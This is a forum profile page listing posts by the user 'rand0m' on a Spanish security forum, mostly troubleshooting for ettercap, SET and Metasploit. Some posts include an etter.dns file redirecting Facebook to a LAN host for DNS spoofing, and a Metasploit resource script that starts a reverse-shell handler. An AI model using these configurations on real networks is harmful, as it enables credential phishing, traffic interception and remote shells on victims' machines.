Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - rand0m

Páginas 1 2 3 4 5 6 ... 12
#61
Seguridad Wireless / Re:LINSET 0.12 - WPA/2 Hack sin Fuerza Bruta
Septiembre 11, 2015, 07:37:22 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Publicado por: Shock Hack en: 23 Mayo 2014, 18:53:50


En GitHub va por la versión 0.14. Quizá es hora de abrir una cuenta y abrirle un issue al bueno de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
#62
Dudas y pedidos generales / Re:Ettercap me tumba la conexion
Septiembre 11, 2015, 07:31:12 AM
Lo que comentas suena muy raro, pero lo primero que comprobaría es que tengas activado ip forwarding.
Comprueba el estado con:
Código: text
cat /proc/sys/net/ipv4/ip_forward

Si está en 0 está desactivado, si está en 1 debería funcionar, el error tendría que estar en otra parte.
Si está a 0 activarlo es tan fácil como teclear:
Código: text
echo "1" >/proc/sys/net/ipv4/ip_forward


Con respecto a tu inquietud:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Además, en la interfaz de ettercap en unos sitios he leído que la víctima es el target 1 y en otros que en Tarhet 1 vas tu y en Target 2 la víctima. Como es la correspondencia?
Si revisamos el manual completo de ettercap (Con el comando man ettercap) nos encontramos con el siguiente párrafo:
CitarTARGET SPECIFICATION
       There is no concept of SOURCE nor DEST. The two targets are intended to filter traffic coming from one to the other and vice-versa (since the connection is bidirectional).

       TARGET is in the form MAC/IPs/PORTs.
       NOTE: If IPv6 is enabled, TARGET is in the form MAC/IPs/IPv6/PORTs.

       If you want you can omit any of its parts and this will represent an ANY in that part.
       e.g.
       "//80" means ANY mac address, ANY ip and ONLY port 80
       "/10.0.0.1/" means ANY mac address, ONLY ip 10.0.0.1 and ANY port

       MAC must be unique and in the form 00:11:22:33:44:55

       IPs is a range of IP in dotted notation. You can specify range with the - (hyphen) and single ip with , (comma). You can also use ; (semicolon) to indicate different ip addresses.
       e.g.
       "10.0.0.1-5;10.0.1.33" expands into ip 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33

       PORTs is a range of PORTS. You can specify range with the - (hyphen) and single port with , (comma).
       e.g.
       "20-25,80,110" expands into ports 20, 21, 22, 23, 24, 25, 80 and 110

       NOTE:
       you can reverse the matching of the TARGET by adding the -R option to the command line. So if you want to sniff ALL the traffic BUT the one coming or going to 10.0.0.1 you can specify "./ettercap -R /10.0.0.1/"

       NOTE:
       TARGETs are also responsible of the initial scan of the lan. You can use them to restrict the scan to only a subset of the hosts in the netmask. The result of the merging between the two targets  will  be  scanned.  remember
       that not specifying a target means "no target", but specifying "//" means "all the hosts in the subnet".
Como podemos ver a pie del título del tema: There is no concept of SOURCE nor DEST. The two targets are intended to filter traffic coming from one to the other and vice-versa (since the connection is bidirectional). Así que no hay ORIGEN ni DESTINO, por lo que no debes preocuparte por eso. ;)

-- EDIT--
En el archivo etter.dns se ve que intentas redirigir Facebook a una máquina en tu red local.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
facebook.com      A   192.168.1.93
*.facebook.com    A   192.168.1.93
www.facebook.com  192.168.1.93      # Wildcards in PTR are not allowed
Pero ahora el que tiene una duda soy yo: ¿setoolkit no ponía el servidor a la escucha en un puerto diferente al 80? Tal vez tengas que añadir un trabajo de redirección en la tabla nat de iptables.
No sé si te estoy siendo de ayuda. Cuando algo no me funciona directamente empiezo a toquetearlo TODO hasta que algo pase, por eso intento buscar todas las posibilidades a la vista. Si nos vas comentando quizá lleguemos a buen puerto (Yo también tuve un cara a cara bastante duro con ettercap, es una herramienta "fácil", pero no tanto).
#63
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Septiembre 10, 2015, 05:49:36 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este no es el rand0m que yo conozco  ;)
rand0m somos todos  :P
#64
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Septiembre 10, 2015, 04:14:46 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Claro pero para que quejarnos tanto ?
Lo que más me motiva es la frustración de no saber si es por el cifrado o si el archivo está corrupto.
Si es un wargame tendré que seguir un walkthough, pero de ellos se aprende (Y mucho).
¡Si alguien entiende qué coño pasa con el archivo que arroje algo de luz! ¡Queremos saber!  ;D
PD: ¡Gracias por los links, Snifer!
#65
Noticias Informáticas / Re:Puerta trasera en discos duros Seagate
Septiembre 10, 2015, 05:35:15 AM
Hay algo que no entiendo.

Si tenemos acceso como root al sistema del disco duro, ¿por qué no podemos editar la configuración de servidor telnet?

¿Alguien tiene algún disco duro de éstos? ¡Los pobres sentimos curiosidad!  ;D
#66
Seguridad / Re:Malware scripting: evita que se ejecute en tu PC
Septiembre 10, 2015, 05:06:45 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Y si algún programa necesita ejecutar un script?
Eso mismo iba a preguntar yo. Creo que el instalador de drivers de nVidia utiliza algunos scripts en .vbs. Voy a hacer el tweak que dice Gabriela en mi sistema anfitrión de escritorio y ya iré reportando en este mismo post la experiencia y los resultados. (En otras palabras: Si algo sale mal vendré a avisar)
#67
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Septiembre 10, 2015, 04:51:10 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Disculpen pero dejen de andar chillando y realicen una breve busqueda en Google y podran obtener cada uno de los libros ;) aquí una breve muestra en vez de quejarse si buscan los que faltan?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 

Espero no se ofendan muchachos.

Regards,
Snifer
No lo has escrito sin ánimo de ofender. Si tenemos que tomarnos la molestia de descargar los libros uno por uno este aporte no sirve para nada, que es precisamente de lo que nos estamos quejando.
Nadie dijo que no se puedan encontrar en la red, lo que pasa es que es una gran recopilación y es una lástima que por mala comunicación se pierda en la nube, sin más.
Creo que en eso estamos todos de acuerdo.
#68
Dudas y pedidos generales / Re:Hacking FB chat
Septiembre 10, 2015, 04:47:41 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como se puede chequear las conversaciones de alguien en el fb.
Normalmente recibes una notificación cuando te escriben. Sólo tienes que ir a la sección "Mensajes" y los tendrás todos ahí, ordenados por el contacto que te escribió.

Si lo que buscas es leer las conversaciones de otra persona lo que tienes que hacer es empezar a buscar información sobre cómo capturar y descifrar información en SSL/TLS. No vamos a ayudarte a espiar a tu pobre novia. Si tienes problemas de comunicación con ella lo mejor es que rompáis. Espiar a la gente viola su confianza.
#69
Ideas y Sugerencias / Re:¿Qué opinas sobre el Staff de Underc0de?
Septiembre 07, 2015, 02:42:49 PM
Yo no tengo ni idea de cuál es la función que desempeña el staff. ¿Os referís a la moderación de foro? ¿Al blog? ¿En general?
Si la respuesta es "en general" creo que me abstengo de responder, porque en general no tengo ni idea.
#70
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Septiembre 01, 2015, 08:15:56 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Mar o montaña?
Galiza

¿Ladillas o lombrices?
#71
Dudas y pedidos generales / Re:Error con SET kali linux
Septiembre 01, 2015, 07:27:00 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Parece un bug, en mi caso también tiene problema para cargar de forma automatizada el recurso
Y ya somos 3 de 3. Pero que bug más extraño, no entiendo a qué viene.
#72
Análisis y desarrollo de malwares / Re:Private Protector ByRoda
Septiembre 01, 2015, 07:25:19 PM
Parece que el motor de Avira está fuerte. Aunque no sé por qué.
#73
Dudas y pedidos generales / Re:Error con SET kali linux
Septiembre 01, 2015, 07:16:12 AM
He probado yo y me he encontrado con lo mismo que tú.
Código: text
       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[-] Cannot find resource script: /root/.set/meta_config

Pero sin embargo sí que existe el archivo.
Código: text
root@KaliSana:~/.set# cat /root/.set/meta_config
use multi/handler
set payload windows/shell_reverse_tcp
set LHOST 192.168.1.241
set LPORT 9191
set ExitOnSession false
exploit -j

No tengo ni idea de por qué metasploit no consigue acceder al archivo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Prueba si se soluciona al actualizar metasploit.
No, metasploit está en su última versión.
Código: text
root@KaliSana:~/.set# apt-get update && apt-get dist-upgrade -y && apt-get upgrade -y
Hit http://http.kali.org sana InRelease       
Hit http://security.kali.org sana/updates InRelease                   
Hit http://http.kali.org sana/main Sources       
Hit http://security.kali.org sana/updates/main Sources                                                 
Hit http://http.kali.org sana/non-free Sources                                                             
Hit http://security.kali.org sana/updates/contrib Sources                                                  
Hit http://http.kali.org sana/contrib Sources                                                              
Hit http://security.kali.org sana/updates/non-free Sources                                                 
Hit http://http.kali.org sana/main i386 Packages                                      
Hit http://security.kali.org sana/updates/main i386 Packages                                               
Hit http://http.kali.org sana/non-free i386 Packages                                                       
Hit http://security.kali.org sana/updates/contrib i386 Packages                                            
Hit http://http.kali.org sana/contrib i386 Packages                                                        
Hit http://security.kali.org sana/updates/non-free i386 Packages                                           
Ign http://http.kali.org sana/contrib Translation-en_US                                                    
Ign http://security.kali.org sana/updates/contrib Translation-en_US                                              
Ign http://http.kali.org sana/contrib Translation-en                                                             
Ign http://security.kali.org sana/updates/contrib Translation-en                                                 
Ign http://http.kali.org sana/main Translation-en_US                                                             
Ign http://security.kali.org sana/updates/main Translation-en_US                                                 
Ign http://http.kali.org sana/main Translation-en                                                                
Ign http://security.kali.org sana/updates/main Translation-en                                                    
Ign http://http.kali.org sana/non-free Translation-en_US                                                         
Ign http://security.kali.org sana/updates/non-free Translation-en_US                                             
Ign http://http.kali.org sana/non-free Translation-en                                                            
Ign http://security.kali.org sana/updates/non-free Translation-en                                                
Reading package lists... Done                                                                                    
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@KaliSana:~/.set# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
[*] No updates available
root@KaliSana:~/.set#
#74
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Septiembre 01, 2015, 06:50:44 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tambien tienes razon Rand0m, yo soy nuevo y creia que esto era normal en el foro, y me encontraria otros casos parecidos.
Para nada, bro. Normalmente aquí intenta ponerse el conocimiento al nivel más llano posible. Entendemos que es un foro técnico, pero en este foro hay una política de no limitar el acceso a los contenidos.
Si ésto es un aporte sería, en cualquier caso, un Wargame.
De no ser así es que hay algún problema con el archivo comprimido. Por eso mostré los checksums, por si debido a algún error en el archivo me encuentro con este problema, pero nadie respondió jamás.
Post lamentable.
#75
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Septiembre 01, 2015, 06:30:09 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Rand0m, el fichero esta cifrado,
lo pone alfinal de la lista de libros.
Normalmente leo los post hasta el final. No me vienes con nada nuevo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El problema es que yo tampoco se por donde tirar, antes de descomprimir hay que realizar "CREO" los pasos a la inversa al cifrado, lo que no me queda claro "por desconocimiento y porque aun no he podido investigar" es para que es lo de offset 00=37, si alguien me puede ayudar.

Despues de decodificado, te debe de quedar un fichero que si podras descomprimir con 7zip, segurametne tambien usando la contraseña adjunta.
Lo que yo creo es que este post sería más útil descifrado. Tal y como está, sin respuestas por parte de los supuestos entendidos en criptografía (No es lo mío, no se puede abarcar todo), este post es más SPAM que aporte. Es como intentar enseñarnos alemán hablándonos en latín.
#76
Noticias Informáticas / Re:Las empresas deben bloquear TOR, dice IBM
Agosto 31, 2015, 06:38:20 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Con todo, IBM explica que los ataques de inyección SQL son los amenazas más comunes que achechan a los usuarios de Tor. "La Deep Web es un lugar verdaderamente oscuro para visitar" y por ello IBM recomienda el bloqueo de TOR en empresas.
"Si navegas por la Deep Web los hackers te harán un SQLi y te van a robar el Facebook".
Es lo más amarillista que escuché jamás por parte de IBM. Me parece toda una campaña de desinformación.
El FBI y la CIA llevan mucho tiempo intentando tirar la red Tor (Sin éxito), y algo me dice que el comunicado de IBM no es más que una nueva estrategia para disuadir a los usuarios que no conozcan el funcionamiento.
#77
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Agosto 31, 2015, 03:59:13 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ábrelo con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola Pistojo, bajé el archivo .7z (dos veces) y no lo reconoce como archivo válido para abrir ni en entorno Win ni en Mac. Probé renombrar el archivo como otros métodos de compresión pero tampoco.
Claramente estoy haciendo algo mal porque no llego ni a poner la clave que se indica en el post.

Gracias!


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola actuario. Que pasos has intentado?

Enviado desde mi SM-G900F mediante Tapatalk
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tengo un problema. No consigo abrirlo como archivo comprimido con 7-Zip 9.38. ¿Soy el único?
Ahora mismo con 7-Zip 15.05 tampoco se reconoce como archivo comprimido.
#78
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 31, 2015, 08:39:52 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nutella o Dulce de Leche
Crema Irlandesa

¿Quake o cualquier otro shooter de pacotilla?
#79
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 29, 2015, 12:00:11 PM
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Insisto: Este exploit tuvo su época de oro, pero fue hace más de 5 años. Aún así estoy descargando la ISO que dices y voy a buscar (Si no es ésta), la última versión OEM de Windows XP.
#80
Dudas y pedidos generales / Re:Duda ultima version de windows 10
Agosto 29, 2015, 11:16:48 AM
Saliéndome un poco del tema quiero hacer mención, ya que veo interés en Windows10, en esta noticia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Páginas 1 2 3 4 5 6 ... 12